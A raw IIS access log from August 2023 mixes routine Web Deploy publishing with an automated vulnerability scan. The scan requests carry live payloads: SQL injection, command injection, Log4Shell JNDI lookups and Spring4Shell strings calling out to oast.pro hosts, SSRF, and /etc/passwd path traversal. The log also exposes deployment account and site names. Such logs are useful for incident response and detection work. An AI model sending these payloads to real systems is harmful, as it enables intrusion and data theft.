Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 77 2023-08-02 06:57:47 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 58 2023-08-02 07:03:35 103.153.214.94 GET /server/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79 2023-08-02 07:09:46 103.153.214.94 POST /admin/login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 82 2023-08-02 07:15:21 103.153.214.94 POST /classes/Master.php f=delete_item 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 56 2023-08-02 07:15:46 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 384 2023-08-02 07:15:53 103.153.214.94 DELETE /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 404 2023-08-02 07:15:59 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 54 2023-08-02 07:20:50 103.153.214.94 POST /session/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 83 2023-08-02 07:26:31 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 68 2023-08-02 07:30:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 17 2023-08-02 07:30:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 33 2023-08-02 07:30:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24 2023-08-02 07:30:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=452e0c84-4c84-4244-a582-056c53fd1656;op=Sync - 200 0 0 394 2023-08-02 07:30:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 518 2023-08-02 07:30:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 35 2023-08-02 07:31:29 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 38113 2023-08-02 07:31:29 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=452e0c84-4c84-4244-a582-056c53fd1656;op=Sync - 200 0 0 37985 2023-08-02 07:35:50 103.153.214.94 POST /wp-comments-post.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 63 2023-08-02 07:35:53 103.153.214.94 GET /wp-content/plugins/imagements/images/2to9gqeryhbxj0mma2qgwa8kyex.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 92 2023-08-02 07:39:20 103.153.214.94 GET /card_scan.php No=123&ReaderNo=`sleep%207`&CardFormatNo=123 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 81 2023-08-02 07:40:29 103.153.214.94 POST /cgi 2 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 107 2023-08-02 07:40:34 103.153.214.94 POST /cgi 7 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 55 2023-08-02 07:42:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 41 2023-08-02 07:42:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 29 2023-08-02 07:42:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=83a5fd08-4708-43e7-b92a-b1202219228d;op=Sync - 200 0 0 206 2023-08-02 07:42:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 373 2023-08-02 07:42:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 23 2023-08-02 07:42:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=83a5fd08-4708-43e7-b92a-b1202219228d;op=Sync - 200 0 0 197 2023-08-02 07:42:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 314 2023-08-02 07:42:51 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 27 2023-08-02 07:42:51 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 40 2023-08-02 07:42:52 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=f92483eb-aa0f-4a8b-a48d-cac82e613730;op=Sync - 200 0 0 884 2023-08-02 07:42:52 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 1015 2023-08-02 07:42:52 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 24 2023-08-02 07:42:53 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 - - 200 0 0 1187 2023-08-02 07:42:53 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.145.175 VS17.0:PublishDialog:WTE17.4.326.54890;sid=f92483eb-aa0f-4a8b-a48d-cac82e613730;op=Sync - 200 0 0 1090 2023-08-02 07:49:48 103.153.214.94 POST /plugin/add - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 80 2023-08-02 07:49:51 103.153.214.94 POST /plugin/customMethod - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 117 2023-08-02 07:54:01 103.153.214.94 GET /data/pbootcms.db - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 93 2023-08-02 07:54:33 103.153.214.94 GET / PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 85 2023-08-02 07:58:26 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 82 2023-08-02 08:05:40 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 72 2023-08-02 08:07:07 103.153.214.94 GET /db_dump.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user_add.php 404 7 0 65 2023-08-02 08:09:50 103.153.214.94 POST /mifs/j_spring_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/mifs/user/login.jsp 404 7 0 117 2023-08-02 08:12:27 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 17 2023-08-02 08:12:27 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 23 2023-08-02 08:12:27 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 29 2023-08-02 08:12:27 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 412 2023-08-02 08:12:27 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=1abbe715-d9fa-4e42-a8ee-cb5c1a273426;op=Sync - 200 0 0 356 2023-08-02 08:12:27 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 9 2023-08-02 08:12:36 103.153.214.94 GET /user/City_ajax.aspx CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2TO9hPthEIt1AB1i6Za7ABMZIyH')),2-- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 115 2023-08-02 08:13:05 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=1abbe715-d9fa-4e42-a8ee-cb5c1a273426;op=Sync - 200 0 0 38058 2023-08-02 08:13:05 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 38113 2023-08-02 08:19:07 103.153.214.94 GET /wlsecurity.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 74 2023-08-02 08:19:54 103.153.214.94 POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 81 2023-08-02 08:20:02 103.153.214.94 GET /wp-content/uploads/2TO9hOJhlN84ui9jFiiTka7LJHO.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 87 2023-08-02 08:24:00 103.153.214.94 GET /.axiom/accounts/do.json - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 66 2023-08-02 08:29:28 103.153.214.94 GET /services/getFile.cmd userfile=config.xml 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 82 2023-08-02 08:31:37 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 21 2023-08-02 08:31:37 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 25 2023-08-02 08:31:37 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22 2023-08-02 08:31:37 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 337 2023-08-02 08:31:37 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=88b028a1-65c8-486a-a565-1f06f1ca4cca;op=Sync - 200 0 0 268 2023-08-02 08:31:37 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 6 2023-08-02 08:32:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 39631 2023-08-02 08:32:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=88b028a1-65c8-486a-a565-1f06f1ca4cca;op=Sync - 200 0 0 39611 2023-08-02 08:33:36 103.153.214.94 GET / id=XLb7y8%25{128*128} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 75 2023-08-02 08:36:24 103.153.214.94 GET /index.php rest_route=/xs-donate-form/payment-redirect/3 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 88 2023-08-02 08:40:36 103.153.214.94 POST /wp-json/am-member/license - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 81 2023-08-02 08:41:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 12 2023-08-02 08:41:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 21 2023-08-02 08:41:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 16 2023-08-02 08:41:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=7294b0f7-4dfb-43df-8404-535689462532;op=Sync - 200 0 0 326 2023-08-02 08:41:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 383 2023-08-02 08:41:50 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8 2023-08-02 08:42:10 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 63 2023-08-02 08:42:18 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://cj4i6mq47492iin2kjb0kdctfzbrhkuna.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 52 2023-08-02 08:42:26 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 379 2023-08-02 08:42:28 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=7294b0f7-4dfb-43df-8404-535689462532;op=Sync - 200 0 0 37675 2023-08-02 08:42:28 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 37703 2023-08-02 08:42:35 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://cj4i6mq47492iin2kjb0jtdgy4jaiyc8h.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 192 2023-08-02 08:44:53 103.153.214.94 POST /classes/Master.php f=delete_team 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 75 2023-08-02 08:55:39 103.153.214.94 GET /index.php/install - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 97 2023-08-02 08:55:47 103.153.214.94 GET /concrete5/index.php/install - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 77 2023-08-02 08:56:13 103.153.214.94 GET /service/error/sfdc_preauth.jsp session=s&userid=1&server=http://cj4i6mq47492iin2kjb0oegkfctnx3ibk.oast.pro%23.salesforce.com/ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 58 2023-08-02 08:59:24 103.153.214.94 GET /groovyconsole - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 89 2023-08-02 08:59:31 103.153.214.94 GET /etc/groovyconsole.html - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 94 2023-08-02 09:06:37 103.153.214.94 GET /wp-login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 57 2023-08-02 09:06:42 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 112 2023-08-02 09:06:47 103.153.214.94 GET / rest_route=/wp/v2/users 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 61 2023-08-02 09:06:52 103.153.214.94 GET /feed/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 81 2023-08-02 09:06:57 103.153.214.94 GET /author-sitemap.xml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 76 2023-08-02 09:14:29 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 81 2023-08-02 09:16:50 103.153.214.94 GET /+CSCOE+/session_password.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 11 0 88 2023-08-02 09:19:37 103.153.214.94 GET /dashboardUser - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 79 2023-08-02 09:24:27 103.153.214.94 GET /GallerySite/filesrc/fotoilan/388/middle/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 400 0 0 125 2023-08-02 09:27:46 103.153.214.94 GET / wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 64 2023-08-02 09:34:11 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 111.90.143.37 - - 404 7 0 61 2023-08-02 09:34:15 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 8 2023-08-02 09:34:15 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22 2023-08-02 09:34:15 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 17 2023-08-02 09:34:15 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 300 2023-08-02 09:34:15 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=2de20447-4249-4197-a046-ff54dff4f8e6;op=Sync - 200 0 0 241 2023-08-02 09:34:15 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8 2023-08-02 09:34:20 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 111.90.143.37 - - 404 7 0 81 2023-08-02 09:34:52 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=2de20447-4249-4197-a046-ff54dff4f8e6;op=Sync - 200 0 0 37141 2023-08-02 09:34:52 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 37176 2023-08-02 09:36:40 103.153.214.94 POST /index.php s=/home/page/uploadImg 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 84 2023-08-02 09:40:35 103.153.214.94 POST /cgi/networkDiag.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60 2023-08-02 09:51:36 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 58 2023-08-02 09:52:45 103.153.214.94 GET /prweb/PRAuth/app/default/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90 2023-08-02 09:53:35 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 74 2023-08-02 09:54:20 103.153.214.94 GET /cgi-bin/admin.cgi Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}cj4i6mq47492iin2kjb0giu8gacf6dkqr.oast.pro 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 101 2023-08-02 09:57:39 103.153.214.94 GET /horde/admin/user.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 91 2023-08-02 09:57:44 103.153.214.94 GET /admin/user.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 61 2023-08-02 10:06:48 103.153.214.94 GET /mainfile.php username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 60 2023-08-02 10:07:08 103.153.214.94 GET /password.jsn - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 55 2023-08-02 10:07:12 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 81 2023-08-02 10:13:54 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-939%7D%24%7B%3A-838}%7D.%24%7BhostName%7D.uri.cj4i6mq47492iin2kjb0i3bb543tdt8cm.oast.pro%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 82 2023-08-02 10:13:59 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-939%7D%24%7B%3A-838}%7D.%24%7BhostName%7D.uri.cj4i6mq47492iin2kjb0pfx9fakyaro48.oast.pro%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 84 2023-08-02 10:20:45 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81 2023-08-02 10:20:59 103.153.214.94 GET /login login=lutron&password=lutron 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 82 2023-08-02 10:22:35 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 71 2023-08-02 10:29:24 103.153.214.94 GET /index.php 